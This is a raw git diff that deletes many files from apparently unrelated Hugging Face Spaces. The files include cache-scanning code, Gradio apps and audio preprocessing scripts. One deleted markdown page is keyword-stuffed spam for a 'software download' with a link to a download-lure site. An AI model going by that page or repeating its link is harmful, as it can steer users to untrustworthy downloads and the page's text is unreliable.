`"google/fleurs"`. - repo_type (`Literal["dataset", "model", "space"]`): - Type of the cached repo. - repo_path (`Path`): - Local path to the cached repo. - size_on_disk (`int`): - Sum of the blob file sizes in the cached repo. - nb_files (`int`): - Total number of blob files in the cached repo. - revisions (`FrozenSet[CachedRevisionInfo]`): - Set of [`~CachedRevisionInfo`] describing all revisions cached in the repo. - last_accessed (`float`): - Timestamp of the last time a blob file of the repo has been accessed. - last_modified (`float`): - Timestamp of the last time a blob file of the repo has been modified/created. - - - - `size_on_disk` is not necessarily the sum of all revisions sizes because of - duplicated files. Besides, only blobs are taken into account, not the (negligible) - size of folders and symlinks. - - - - - - `last_accessed` and `last_modified` reliability can depend on the OS you are using. - See [python documentation](https://docs.python.org/3/library/os.html#os.stat_result) - for more details. - - - """ - - repo_id: str - repo_type: REPO_TYPE_T - repo_path: Path - size_on_disk: int - nb_files: int - revisions: FrozenSet[CachedRevisionInfo] - - last_accessed: float - last_modified: float - - @property - def last_accessed_str(self) -> str: - """ - (property) Last time a blob file of the repo has been accessed, returned as a - human-readable string. - - Example: "2 weeks ago". - """ - return _format_timesince(self.last_accessed) - - @property - def last_modified_str(self) -> str: - """ - (property) Last time a blob file of the repo has been modified, returned as a - human-readable string. - - Example: "2 weeks ago". - """ - return _format_timesince(self.last_modified) - - @property - def size_on_disk_str(self) -> str: - """ - (property) Sum of the blob file sizes as a human-readable string. - - Example: "42.2K". - """ - return _format_size(self.size_on_disk) - - @property - def refs(self) -> Dict[str, CachedRevisionInfo]: - """ - (property) Mapping between `refs` and revision data structures. - """ - return {ref: revision for revision in self.revisions for ref in revision.refs} - - -@dataclass(frozen=True) -class DeleteCacheStrategy: - """Frozen data structure holding the strategy to delete cached revisions. - - This object is not meant to be instantiated programmatically but to be returned by - [`~utils.HFCacheInfo.delete_revisions`]. See documentation for usage example. - - Args: - expected_freed_size (`float`): - Expected freed size once strategy is executed. - blobs (`FrozenSet[Path]`): - Set of blob file paths to be deleted. - refs (`FrozenSet[Path]`): - Set of reference file paths to be deleted. - repos (`FrozenSet[Path]`): - Set of entire repo paths to be deleted. - snapshots (`FrozenSet[Path]`): - Set of snapshots to be deleted (directory of symlinks). - """ - - expected_freed_size: int - blobs: FrozenSet[Path] - refs: FrozenSet[Path] - repos: FrozenSet[Path] - snapshots: FrozenSet[Path] - - @property - def expected_freed_size_str(self) -> str: - """ - (property) Expected size that will be freed as a human-readable string. - - Example: "42.2K". - """ - return _format_size(self.expected_freed_size) - - def execute(self) -> None: - """Execute the defined strategy. - - - - If this method is interrupted, the cache might get corrupted. Deletion order is - implemented so that references and symlinks are deleted before the actual blob - files. - - - - - - This method is irreversible. If executed, cached files are erased and must be - downloaded again. - - - """ - # Deletion order matters. Blobs are deleted in last so that the user can't end - # up in a state where a `ref`` refers to a missing snapshot or a snapshot - # symlink refers to a deleted blob. - - # Delete entire repos - for path in self.repos: - _try_delete_path(path, path_type="repo") - - # Delete snapshot directories - for path in self.snapshots: - _try_delete_path(path, path_type="snapshot") - - # Delete refs files - for path in self.refs: - _try_delete_path(path, path_type="ref") - - # Delete blob files - for path in self.blobs: - _try_delete_path(path, path_type="blob") - - logger.info(f"Cache deletion done. Saved {self.expected_freed_size_str}.") - - -@dataclass(frozen=True) -class HFCacheInfo: - """Frozen data structure holding information about the entire cache-system. - - This data structure is returned by [`scan_cache_dir`] and is immutable. - - Args: - size_on_disk (`int`): - Sum of all valid repo sizes in the cache-system. - repos (`FrozenSet[CachedRepoInfo]`): - Set of [`~CachedRepoInfo`] describing all valid cached repos found on the - cache-system while scanning. - warnings (`List[CorruptedCacheException]`): - List of [`~CorruptedCacheException`] that occurred while scanning the cache. - Those exceptions are captured so that the scan can continue. Corrupted repos - are skipped from the scan. - - - - Here `size_on_disk` is equal to the sum of all repo sizes (only blobs). However if - some cached repos are corrupted, their sizes are not taken into account. - - - """ - - size_on_disk: int - repos: FrozenSet[CachedRepoInfo] - warnings: List[CorruptedCacheException] - - @property - def size_on_disk_str(self) -> str: - """ - (property) Sum of all valid repo sizes in the cache-system as a human-readable - string. - - Example: "42.2K". - """ - return _format_size(self.size_on_disk) - - def delete_revisions(self, *revisions: str) -> DeleteCacheStrategy: - """Prepare the strategy to delete one or more revisions cached locally. - - Input revisions can be any revision hash. If a revision hash is not found in the - local cache, a warning is thrown but no error is raised. Revisions can be from - different cached repos since hashes are unique across repos, - - Examples: - ```py - >>> from huggingface_hub import scan_cache_dir - >>> cache_info = scan_cache_dir() - >>> delete_strategy = cache_info.delete_revisions( - ... "81fd1d6e7847c99f5862c9fb81387956d99ec7aa" - ... ) - >>> print(f"Will free {delete_strategy.expected_freed_size_str}.") - Will free 7.9K. - >>> delete_strategy.execute() - Cache deletion done. Saved 7.9K. - ``` - - ```py - >>> from huggingface_hub import scan_cache_dir - >>> scan_cache_dir().delete_revisions( - ... "81fd1d6e7847c99f5862c9fb81387956d99ec7aa", - ... "e2983b237dccf3ab4937c97fa717319a9ca1a96d", - ... "6c0e6080953db56375760c0471a8c5f2929baf11", - ... ).execute() - Cache deletion done. Saved 8.6G. - ``` - - - - `delete_revisions` returns a [`~utils.DeleteCacheStrategy`] object that needs to - be executed. The [`~utils.DeleteCacheStrategy`] is not meant to be modified but - allows having a dry run before actually executing the deletion. - - - """ - hashes_to_delete: Set[str] = set(revisions) - - repos_with_revisions: Dict[CachedRepoInfo, Set[CachedRevisionInfo]] = defaultdict(set) - - for repo in self.repos: - for revision in repo.revisions: - if revision.commit_hash in hashes_to_delete: - repos_with_revisions[repo].add(revision) - hashes_to_delete.remove(revision.commit_hash) - - if len(hashes_to_delete) > 0: - logger.warning(f"Revision(s) not found - cannot delete them: {', '.join(hashes_to_delete)}") - - delete_strategy_blobs: Set[Path] = set() - delete_strategy_refs: Set[Path] = set() - delete_strategy_repos: Set[Path] = set() - delete_strategy_snapshots: Set[Path] = set() - delete_strategy_expected_freed_size = 0 - - for affected_repo, revisions_to_delete in repos_with_revisions.items(): - other_revisions = affected_repo.revisions - revisions_to_delete - - # If no other revisions, it means all revisions are deleted - # -> delete the entire cached repo - if len(other_revisions) == 0: - delete_strategy_repos.add(affected_repo.repo_path) - delete_strategy_expected_freed_size += affected_repo.size_on_disk - continue - - # Some revisions of the repo will be deleted but not all. We need to filter - # which blob files will not be linked anymore. - for revision_to_delete in revisions_to_delete: - # Snapshot dir - delete_strategy_snapshots.add(revision_to_delete.snapshot_path) - - # Refs dir - for ref in revision_to_delete.refs: - delete_strategy_refs.add(affected_repo.repo_path / "refs" / ref) - - # Blobs dir - for file in revision_to_delete.files: - if file.blob_path not in delete_strategy_blobs: - is_file_alone = True - for revision in other_revisions: - for rev_file in revision.files: - if file.blob_path == rev_file.blob_path: - is_file_alone = False - break - if not is_file_alone: - break - - # Blob file not referenced by remaining revisions -> delete - if is_file_alone: - delete_strategy_blobs.add(file.blob_path) - delete_strategy_expected_freed_size += file.size_on_disk - - # Return the strategy instead of executing it. - return DeleteCacheStrategy( - blobs=frozenset(delete_strategy_blobs), - refs=frozenset(delete_strategy_refs), - repos=frozenset(delete_strategy_repos), - snapshots=frozenset(delete_strategy_snapshots), - expected_freed_size=delete_strategy_expected_freed_size, - ) - - -def scan_cache_dir(cache_dir: Optional[Union[str, Path]] = None) -> HFCacheInfo: - """Scan the entire HF cache-system and return a [`~HFCacheInfo`] structure. - - Use `scan_cache_dir` in order to programmatically scan your cache-system. The cache - will be scanned repo by repo. If a repo is corrupted, a [`~CorruptedCacheException`] - will be thrown internally but captured and returned in the [`~HFCacheInfo`] - structure. Only valid repos get a proper report. - - ```py - >>> from huggingface_hub import scan_cache_dir - - >>> hf_cache_info = scan_cache_dir() - HFCacheInfo( - size_on_disk=3398085269, - repos=frozenset({ - CachedRepoInfo( - repo_id='t5-small', - repo_type='model', - repo_path=PosixPath(...), - size_on_disk=970726914, - nb_files=11, - revisions=frozenset({ - CachedRevisionInfo( - commit_hash='d78aea13fa7ecd06c29e3e46195d6341255065d5', - size_on_disk=970726339, - snapshot_path=PosixPath(...), - files=frozenset({ - CachedFileInfo( - file_name='config.json', - size_on_disk=1197 - file_path=PosixPath(...), - blob_path=PosixPath(...), - ), - CachedFileInfo(...), - ... - }), - ), - CachedRevisionInfo(...), - ... - }), - ), - CachedRepoInfo(...), - ... - }), - warnings=[ - CorruptedCacheException("Snapshots dir doesn't exist in cached repo: ..."), - CorruptedCacheException(...), - ... - ], - ) - ``` - - You can also print a detailed report directly from the `huggingface-cli` using: - ```text - > huggingface-cli scan-cache - REPO ID REPO TYPE SIZE ON DISK NB FILES REFS LOCAL PATH - --------------------------- --------- ------------ -------- ------------------- ------------------------------------------------------------------------- - glue dataset 116.3K 15 1.17.0, main, 2.4.0 /Users/lucain/.cache/huggingface/hub/datasets--glue - google/fleurs dataset 64.9M 6 main, refs/pr/1 /Users/lucain/.cache/huggingface/hub/datasets--google--fleurs - Jean-Baptiste/camembert-ner model 441.0M 7 main /Users/lucain/.cache/huggingface/hub/models--Jean-Baptiste--camembert-ner - bert-base-cased model 1.9G 13 main /Users/lucain/.cache/huggingface/hub/models--bert-base-cased - t5-base model 10.1K 3 main /Users/lucain/.cache/huggingface/hub/models--t5-base - t5-small model 970.7M 11 refs/pr/1, main /Users/lucain/.cache/huggingface/hub/models--t5-small - - Done in 0.0s. Scanned 6 repo(s) for a total of 3.4G. - Got 1 warning(s) while scanning. Use -vvv to print details. - ``` - - Args: - cache_dir (`str` or `Path`, `optional`): - Cache directory to cache. Defaults to the default HF cache directory. - - - - Raises: - - `CacheNotFound` - If the cache directory does not exist. - - [`ValueError`](https://docs.python.org/3/library/exceptions.html#ValueError) - If the cache directory is a file, instead of a directory. - - - - Returns: a [`~HFCacheInfo`] object. - """ - if cache_dir is None: - cache_dir = HUGGINGFACE_HUB_CACHE - - cache_dir = Path(cache_dir).expanduser().resolve() - if not cache_dir.exists(): - raise CacheNotFound( - ( - f"Cache directory not found: {cache_dir}. Please use `cache_dir`" - " argument or set `HUGGINGFACE_HUB_CACHE` environment variable." - ), - cache_dir=cache_dir, - ) - - if cache_dir.is_file(): - raise ValueError( - f"Scan cache expects a directory but found a file: {cache_dir}. Please use" - " `cache_dir` argument or set `HUGGINGFACE_HUB_CACHE` environment" - " variable." - ) - - repos: Set[CachedRepoInfo] = set() - warnings: List[CorruptedCacheException] = [] - for repo_path in cache_dir.iterdir(): - try: - repos.add(_scan_cached_repo(repo_path)) - except CorruptedCacheException as e: - warnings.append(e) - - return HFCacheInfo( - repos=frozenset(repos), - size_on_disk=sum(repo.size_on_disk for repo in repos), - warnings=warnings, - ) - - -def _scan_cached_repo(repo_path: Path) -> CachedRepoInfo: - """Scan a single cache repo and return information about it. - - Any unexpected behavior will raise a [`~CorruptedCacheException`]. - """ - if not repo_path.is_dir(): - raise CorruptedCacheException(f"Repo path is not a directory: {repo_path}") - - if "--" not in repo_path.name: - raise CorruptedCacheException(f"Repo path is not a valid HuggingFace cache directory: {repo_path}") - - repo_type, repo_id = repo_path.name.split("--", maxsplit=1) - repo_type = repo_type[:-1] # "models" -> "model" - repo_id = repo_id.replace("--", "/") # google/fleurs -> "google/fleurs" - - if repo_type not in {"dataset", "model", "space"}: - raise CorruptedCacheException( - f"Repo type must be `dataset`, `model` or `space`, found `{repo_type}` ({repo_path})." - ) - - blob_stats: Dict[Path, os.stat_result] = {} # Key is blob_path, value is blob stats - - snapshots_path = repo_path / "snapshots" - refs_path = repo_path / "refs" - - if not snapshots_path.exists() or not snapshots_path.is_dir(): - raise CorruptedCacheException(f"Snapshots dir doesn't exist in cached repo: {snapshots_path}") - - # Scan over `refs` directory - - # key is revision hash, value is set of refs - refs_by_hash: Dict[str, Set[str]] = defaultdict(set) - if refs_path.exists(): - # Example of `refs` directory - # ── refs - # ├── main - # └── refs - # └── pr - # └── 1 - if refs_path.is_file(): - raise CorruptedCacheException(f"Refs directory cannot be a file: {refs_path}") - - for ref_path in refs_path.glob("**/*"): - # glob("**/*") iterates over all files and directories -> skip directories - if ref_path.is_dir(): - continue - - ref_name = str(ref_path.relative_to(refs_path)) - with ref_path.open() as f: - commit_hash = f.read() - - refs_by_hash[commit_hash].add(ref_name) - - # Scan snapshots directory - cached_revisions: Set[CachedRevisionInfo] = set() - for revision_path in snapshots_path.iterdir(): - if revision_path.is_file(): - raise CorruptedCacheException(f"Snapshots folder corrupted. Found a file: {revision_path}") - - cached_files = set() - for file_path in revision_path.glob("**/*"): - # glob("**/*") iterates over all files and directories -> skip directories - if file_path.is_dir(): - continue - - blob_path = Path(file_path).resolve() - if not blob_path.exists(): - raise CorruptedCacheException(f"Blob missing (broken symlink): {blob_path}") - - if blob_path not in blob_stats: - blob_stats[blob_path] = blob_path.stat() - - cached_files.add( - CachedFileInfo( - file_name=file_path.name, - file_path=file_path, - size_on_disk=blob_stats[blob_path].st_size, - blob_path=blob_path, - blob_last_accessed=blob_stats[blob_path].st_atime, - blob_last_modified=blob_stats[blob_path].st_mtime, - ) - ) - - # Last modified is either the last modified blob file or the revision folder - # itself if it is empty - if len(cached_files) > 0: - revision_last_modified = max(blob_stats[file.blob_path].st_mtime for file in cached_files) - else: - revision_last_modified = revision_path.stat().st_mtime - - cached_revisions.add( - CachedRevisionInfo( - commit_hash=revision_path.name, - files=frozenset(cached_files), - refs=frozenset(refs_by_hash.pop(revision_path.name, set())), - size_on_disk=sum( - blob_stats[blob_path].st_size for blob_path in set(file.blob_path for file in cached_files) - ), - snapshot_path=revision_path, - last_modified=revision_last_modified, - ) - ) - - # Check that all refs referred to an existing revision - if len(refs_by_hash) > 0: - raise CorruptedCacheException( - f"Reference(s) refer to missing commit hashes: {dict(refs_by_hash)} ({repo_path})." - ) - - # Last modified is either the last modified blob file or the repo folder itself if - # no blob files has been found. Same for last accessed. - if len(blob_stats) > 0: - repo_last_accessed = max(stat.st_atime for stat in blob_stats.values()) - repo_last_modified = max(stat.st_mtime for stat in blob_stats.values()) - else: - repo_stats = repo_path.stat() - repo_last_accessed = repo_stats.st_atime - repo_last_modified = repo_stats.st_mtime - - # Build and return frozen structure - return CachedRepoInfo( - nb_files=len(blob_stats), - repo_id=repo_id, - repo_path=repo_path, - repo_type=repo_type, # type: ignore - revisions=frozenset(cached_revisions), - size_on_disk=sum(stat.st_size for stat in blob_stats.values()), - last_accessed=repo_last_accessed, - last_modified=repo_last_modified, - ) - - -def _format_size(num: int) -> str: - """Format size in bytes into a human-readable string. - - Taken from https://stackoverflow.com/a/1094933 - """ - num_f = float(num) - for unit in ["", "K", "M", "G", "T", "P", "E", "Z"]: - if abs(num_f) < 1000.0: - return f"{num_f:3.1f}{unit}" - num_f /= 1000.0 - return f"{num_f:.1f}Y" - - -_TIMESINCE_CHUNKS = ( - # Label, divider, max value - ("second", 1, 60), - ("minute", 60, 60), - ("hour", 60 * 60, 24), - ("day", 60 * 60 * 24, 6), - ("week", 60 * 60 * 24 * 7, 6), - ("month", 60 * 60 * 24 * 30, 11), - ("year", 60 * 60 * 24 * 365, None), -) - - -def _format_timesince(ts: float) -> str: - """Format timestamp in seconds into a human-readable string, relative to now. - - Vaguely inspired by Django's `timesince` formatter. - """ - delta = time.time() - ts - if delta < 20: - return "a few seconds ago" - for label, divider, max_value in _TIMESINCE_CHUNKS: # noqa: B007 - value = round(delta / divider) - if max_value is not None and value <= max_value: - break - return f"{value} {label}{'s' if value > 1 else ''} ago" - - -def _try_delete_path(path: Path, path_type: str) -> None: - """Try to delete a local file or folder. - - If the path does not exists, error is logged as a warning and then ignored. - - Args: - path (`Path`) - Path to delete. Can be a file or a folder. - path_type (`str`) - What path are we deleting ? Only for logging purposes. Example: "snapshot". - """ - logger.info(f"Delete {path_type}: {path}") - try: - if path.is_file(): - os.remove(path) - else: - shutil.rmtree(path) - except FileNotFoundError: - logger.warning(f"Couldn't delete {path_type}: file not found ({path})", exc_info=True) - except PermissionError: - logger.warning(f"Couldn't delete {path_type}: permission denied ({path})", exc_info=True) diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/matplotlib/testing/jpl_units/UnitDblFormatter.py b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/matplotlib/testing/jpl_units/UnitDblFormatter.py deleted file mode 100644 index da262eae3e2d569ac37e9cf9b118a72e61b0e7d2..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/matplotlib/testing/jpl_units/UnitDblFormatter.py +++ /dev/null @@ -1,28 +0,0 @@ -"""UnitDblFormatter module containing class UnitDblFormatter.""" - -import matplotlib.ticker as ticker - -__all__ = ['UnitDblFormatter'] - - -class UnitDblFormatter(ticker.ScalarFormatter): - """ - The formatter for UnitDbl data types. - - This allows for formatting with the unit string. - """ - - def __call__(self, x, pos=None): - # docstring inherited - if len(self.locs) == 0: - return '' - else: - return '{:.12}'.format(x) - - def format_data_short(self, value): - # docstring inherited - return '{:.12}'.format(value) - - def format_data(self, value): - # docstring inherited - return '{:.12}'.format(value) diff --git a/spaces/lakshmi324/DocuAI/README.md b/spaces/lakshmi324/DocuAI/README.md deleted file mode 100644 index 14b8ef155c7e43d4df3637b14e971585c517a4e3..0000000000000000000000000000000000000000 --- a/spaces/lakshmi324/DocuAI/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: OpenAI PDF QnA -emoji: 📉 -colorFrom: blue -colorTo: indigo -sdk: gradio -sdk_version: 3.24.1 -app_file: app.py -pinned: false -license: apache-2.0 ---- -[Check out my blog](https://bitsnbytesofai.hashnode.dev/unlocking-the-power-of-pdfs-with-ai-a-guide-to-building-your-own-qa-system) - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/leave7/kazunaAI2.0/inference_main.py b/spaces/leave7/kazunaAI2.0/inference_main.py deleted file mode 100644 index 825e791db86d37e955f42e8cb34323dbb248ed32..0000000000000000000000000000000000000000 --- a/spaces/leave7/kazunaAI2.0/inference_main.py +++ /dev/null @@ -1,65 +0,0 @@ -import io -import logging -import time -from pathlib import Path - -import librosa -import numpy as np -import soundfile - -from inference import infer_tool -from inference import slicer -from inference.infer_tool import Svc - -logging.getLogger('numba').setLevel(logging.WARNING) -chunks_dict = infer_tool.read_temp("inference/chunks_temp.json") - -model_path = "logs/48k/G_174000-Copy1.pth" -config_path = "configs/config.json" -svc_model = Svc(model_path, config_path) -infer_tool.mkdir(["raw", "results"]) - -# 支持多个wav文件,放在raw文件夹下 -clean_names = ["君の知らない物語-src"] -trans = [-5] # 音高调整,支持正负(半音) -spk_list = ['yunhao'] # 每次同时合成多语者音色 -slice_db = -40 # 默认-40,嘈杂的音频可以-30,干声保留呼吸可以-50 -wav_format = 'flac' # 音频输出格式 - -infer_tool.fill_a_to_b(trans, clean_names) -for clean_name, tran in zip(clean_names, trans): - raw_audio_path = f"raw/{clean_name}" - if "." not in raw_audio_path: - raw_audio_path += ".wav" - infer_tool.format_wav(raw_audio_path) - wav_path = Path(raw_audio_path).with_suffix('.wav') - audio, sr = librosa.load(wav_path, mono=True, sr=None) - wav_hash = infer_tool.get_md5(audio) - if wav_hash in chunks_dict.keys(): - print("load chunks from temp") - chunks = chunks_dict[wav_hash]["chunks"] - else: - chunks = slicer.cut(wav_path, db_thresh=slice_db) - print(chunks) - chunks_dict[wav_hash] = {"chunks": chunks, "time": int(time.time())} - infer_tool.write_temp("inference/chunks_temp.json", chunks_dict) - audio_data, audio_sr = slicer.chunks2audio(wav_path, chunks) - - for spk in spk_list: - audio = [] - for (slice_tag, data) in audio_data: - print(f'#=====segment start, {round(len(data) / audio_sr, 3)}s======') - length = int(np.ceil(len(data) / audio_sr * svc_model.target_sample)) - raw_path = io.BytesIO() - soundfile.write(raw_path, data, audio_sr, format="wav") - raw_path.seek(0) - if slice_tag: - print('jump empty segment') - _audio = np.zeros(length) - else: - out_audio, out_sr = svc_model.infer(spk, tran, raw_path) - _audio = out_audio.cpu().numpy() - audio.extend(list(_audio)) - - res_path = f'./results/{clean_name}_{tran}key_{spk}.{wav_format}' - soundfile.write(res_path, audio, svc_model.target_sample, format=wav_format) diff --git a/spaces/leonelhs/carvekit/app.py b/spaces/leonelhs/carvekit/app.py deleted file mode 100644 index 373066a9d31997c69fbd3b525ea51af65c12e13c..0000000000000000000000000000000000000000 --- a/spaces/leonelhs/carvekit/app.py +++ /dev/null @@ -1,95 +0,0 @@ -import gradio as gr -import torch -from carvekit.api.interface import Interface -from carvekit.ml.wrap.basnet import BASNET -from carvekit.ml.wrap.deeplab_v3 import DeepLabV3 -from carvekit.ml.wrap.fba_matting import FBAMatting -from carvekit.ml.wrap.tracer_b7 import TracerUniversalB7 -from carvekit.ml.wrap.u2net import U2NET -from carvekit.pipelines.postprocessing import MattingMethod -from carvekit.pipelines.preprocessing import PreprocessingStub -from carvekit.trimap.generator import TrimapGenerator - -device = 'cuda' if torch.cuda.is_available() else 'cpu' - -segment_net = { - "U2NET": U2NET(device=device, batch_size=1), - "BASNET": BASNET(device=device, batch_size=1), - "DeepLabV3": DeepLabV3(device=device, batch_size=1), - "TracerUniversalB7": TracerUniversalB7(device=device, batch_size=1) -} - -fba = FBAMatting(device=device, - input_tensor_size=2048, - batch_size=1) - -trimap = TrimapGenerator() - -preprocessing = PreprocessingStub() - -postprocessing = MattingMethod(matting_module=fba, - trimap_generator=trimap, - device=device) - -method_choices = [k for k, v in segment_net.items()] - - -def generate_trimap(method, original): - mask = segment_net[method]([original]) - return trimap(original_image=original, mask=mask[0]) - - -def predict(method, image): - method = segment_net[method] - return Interface(pre_pipe=preprocessing, - post_pipe=postprocessing, - seg_pipe=method)([image])[0] - - -footer = r""" -
    -CarveKit -
    - -Demo based on CarveKit - -
    -""" - -with gr.Blocks(title="CarveKit") as app: - gr.Markdown("

    CarveKit

    ") - gr.HTML("

    High-quality image background removal

    ") - - with gr.Tabs() as tabs: - with gr.TabItem("Remove background", id=0): - with gr.Row(equal_height=False): - with gr.Column(): - input_img = gr.Image(type="pil", label="Input image") - drp_itf = gr.Dropdown( - value="TracerUniversalB7", - label="Segmentor model", - choices=method_choices) - run_btn = gr.Button(variant="primary") - with gr.Column(): - output_img = gr.Image(type="pil", label="result") - - run_btn.click(predict, [drp_itf, input_img], [output_img]) - - with gr.TabItem("Trimap generator", id=1): - with gr.Row(equal_height=False): - with gr.Column(): - trimap_input = gr.Image(type="pil", label="Input image") - drp_itf = gr.Dropdown( - value="TracerUniversalB7", - label="Segmentor model", - choices=method_choices) - trimap_btn = gr.Button(variant="primary") - with gr.Column(): - trimap_output = gr.Image(type="pil", label="result") - - trimap_btn.click(generate_trimap, [drp_itf, trimap_input], [trimap_output]) - - with gr.Row(): - gr.HTML(footer) - -app.launch(share=False, debug=True, enable_queue=True, show_error=True) diff --git a/spaces/lewiswu1209/MockingBird/ppg2mel/preprocess.py b/spaces/lewiswu1209/MockingBird/ppg2mel/preprocess.py deleted file mode 100644 index 0feee6e2458ee770d1b94c53a043b1146b580cef..0000000000000000000000000000000000000000 --- a/spaces/lewiswu1209/MockingBird/ppg2mel/preprocess.py +++ /dev/null @@ -1,113 +0,0 @@ - -import os -import torch -import numpy as np -from tqdm import tqdm -from pathlib import Path -import soundfile -import resampy - -from ppg_extractor import load_model -import encoder.inference as Encoder -from encoder.audio import preprocess_wav -from encoder import audio -from utils.f0_utils import compute_f0 - -from torch.multiprocessing import Pool, cpu_count -from functools import partial - -SAMPLE_RATE=16000 - -def _compute_bnf( - wav: any, - output_fpath: str, - device: torch.device, - ppg_model_local: any, -): - """ - Compute CTC-Attention Seq2seq ASR encoder bottle-neck features (BNF). - """ - ppg_model_local.to(device) - wav_tensor = torch.from_numpy(wav).float().to(device).unsqueeze(0) - wav_length = torch.LongTensor([wav.shape[0]]).to(device) - with torch.no_grad(): - bnf = ppg_model_local(wav_tensor, wav_length) - bnf_npy = bnf.squeeze(0).cpu().numpy() - np.save(output_fpath, bnf_npy, allow_pickle=False) - return bnf_npy, len(bnf_npy) - -def _compute_f0_from_wav(wav, output_fpath): - """Compute merged f0 values.""" - f0 = compute_f0(wav, SAMPLE_RATE) - np.save(output_fpath, f0, allow_pickle=False) - return f0, len(f0) - -def _compute_spkEmbed(wav, output_fpath, encoder_model_local, device): - Encoder.set_model(encoder_model_local) - # Compute where to split the utterance into partials and pad if necessary - wave_slices, mel_slices = Encoder.compute_partial_slices(len(wav), rate=1.3, min_pad_coverage=0.75) - max_wave_length = wave_slices[-1].stop - if max_wave_length >= len(wav): - wav = np.pad(wav, (0, max_wave_length - len(wav)), "constant") - - # Split the utterance into partials - frames = audio.wav_to_mel_spectrogram(wav) - frames_batch = np.array([frames[s] for s in mel_slices]) - partial_embeds = Encoder.embed_frames_batch(frames_batch) - - # Compute the utterance embedding from the partial embeddings - raw_embed = np.mean(partial_embeds, axis=0) - embed = raw_embed / np.linalg.norm(raw_embed, 2) - - np.save(output_fpath, embed, allow_pickle=False) - return embed, len(embed) - -def preprocess_one(wav_path, out_dir, device, ppg_model_local, encoder_model_local): - # wav = preprocess_wav(wav_path) - # try: - wav, sr = soundfile.read(wav_path) - if len(wav) < sr: - return None, sr, len(wav) - if sr != SAMPLE_RATE: - wav = resampy.resample(wav, sr, SAMPLE_RATE) - sr = SAMPLE_RATE - utt_id = os.path.basename(wav_path).rstrip(".wav") - - _, length_bnf = _compute_bnf(output_fpath=f"{out_dir}/bnf/{utt_id}.ling_feat.npy", wav=wav, device=device, ppg_model_local=ppg_model_local) - _, length_f0 = _compute_f0_from_wav(output_fpath=f"{out_dir}/f0/{utt_id}.f0.npy", wav=wav) - _, length_embed = _compute_spkEmbed(output_fpath=f"{out_dir}/embed/{utt_id}.npy", device=device, encoder_model_local=encoder_model_local, wav=wav) - -def preprocess_dataset(datasets_root, dataset, out_dir, n_processes, ppg_encoder_model_fpath, speaker_encoder_model): - # Glob wav files - wav_file_list = sorted(Path(f"{datasets_root}/{dataset}").glob("**/*.wav")) - print(f"Globbed {len(wav_file_list)} wav files.") - - out_dir.joinpath("bnf").mkdir(exist_ok=True, parents=True) - out_dir.joinpath("f0").mkdir(exist_ok=True, parents=True) - out_dir.joinpath("embed").mkdir(exist_ok=True, parents=True) - ppg_model_local = load_model(ppg_encoder_model_fpath, "cpu") - encoder_model_local = Encoder.load_model(speaker_encoder_model, "cpu") - if n_processes is None: - n_processes = cpu_count() - - device = torch.device("cuda" if torch.cuda.is_available() else "cpu") - func = partial(preprocess_one, out_dir=out_dir, ppg_model_local=ppg_model_local, encoder_model_local=encoder_model_local, device=device) - job = Pool(n_processes).imap(func, wav_file_list) - list(tqdm(job, "Preprocessing", len(wav_file_list), unit="wav")) - - # finish processing and mark - t_fid_file = out_dir.joinpath("train_fidlist.txt").open("w", encoding="utf-8") - d_fid_file = out_dir.joinpath("dev_fidlist.txt").open("w", encoding="utf-8") - e_fid_file = out_dir.joinpath("eval_fidlist.txt").open("w", encoding="utf-8") - for file in sorted(out_dir.joinpath("f0").glob("*.npy")): - id = os.path.basename(file).split(".f0.npy")[0] - if id.endswith("01"): - d_fid_file.write(id + "\n") - elif id.endswith("09"): - e_fid_file.write(id + "\n") - else: - t_fid_file.write(id + "\n") - t_fid_file.close() - d_fid_file.close() - e_fid_file.close() - return len(wav_file_list) diff --git a/spaces/lhoestq/datasets-explorer/README.md b/spaces/lhoestq/datasets-explorer/README.md deleted file mode 100644 index 292d06ee6de07ba1564b0d51c85f6819010ba470..0000000000000000000000000000000000000000 --- a/spaces/lhoestq/datasets-explorer/README.md +++ /dev/null @@ -1,20 +0,0 @@ ---- -title: Datasets Explorer -emoji: 📖 -colorFrom: pink -colorTo: purple -sdk: gradio -sdk_version: 3.19.1 -app_file: app.py -pinned: false ---- - -# 📖 Dataset Explorer - -Access any slice of data of any dataset on the [Hugging Face Dataset Hub](https://huggingface.co/datasets) - -Run: - -```python -gradio app.py -``` diff --git a/spaces/lincquiQcaudo/Top-20-Diffusion/Download Software Rangka Atap Baja 12.md b/spaces/lincquiQcaudo/Top-20-Diffusion/Download Software Rangka Atap Baja 12.md deleted file mode 100644 index 252f4b72aff53aa5c583d35360bed0485b70f6db..0000000000000000000000000000000000000000 --- a/spaces/lincquiQcaudo/Top-20-Diffusion/Download Software Rangka Atap Baja 12.md +++ /dev/null @@ -1,6 +0,0 @@ -

    download software rangka atap baja 12


    Download Zip »»» https://bytlly.com/2uGw0a



    -
    -pasang rangka atap baja ringan jayawan, platinum truss system baja ringan ... ppt download, software rangka atap baja ringan cv sukses mandiri teknik, rangka atap ... The Essence Of Success 12 Mini Biographies Richard Branson Bill Gates ... 4d29de3e1b
    -
    -
    -

    diff --git a/spaces/luisoala/raw2logit/app.py b/spaces/luisoala/raw2logit/app.py deleted file mode 100644 index a711ca3f9e47064deb6d2514c307f1ee22eb84d2..0000000000000000000000000000000000000000 --- a/spaces/luisoala/raw2logit/app.py +++ /dev/null @@ -1,57 +0,0 @@ -import gradio as gr -#import tensorflow as tf -import numpy as np -import json -from os.path import dirname, realpath, join -import processing.pipeline_numpy as ppn - - -# Load human-readable labels for ImageNet. -current_dir = dirname(realpath(__file__)) - - -def process(RawImage, CameraParameters, Debayer, Sharpening, Denoising): - raw_img = RawImage - if CameraParameters == "Microscope": - black_level = [9.834368023181512e-06, 9.834368023181512e-06, 9.834368023181512e-06, 9.834368023181512e-06] - white_balance = [-0.6567, 1.9673, 3.5304] - colour_matrix = [-2.0338, 0.0933, 0.4157, -0.0286, 2.6464, -0.0574, -0.5516, -0.0947, 2.9308] - elif CameraParameters == "Drone": - #drone - black_level = [0.0625, 0.0626, 0.0625, 0.0626] - white_balance = [2.86653646, 1., 1.73079425] - colour_matrix = [1.50768983, -0.33571374, -0.17197604, -0.23048614, - 1.70698738, 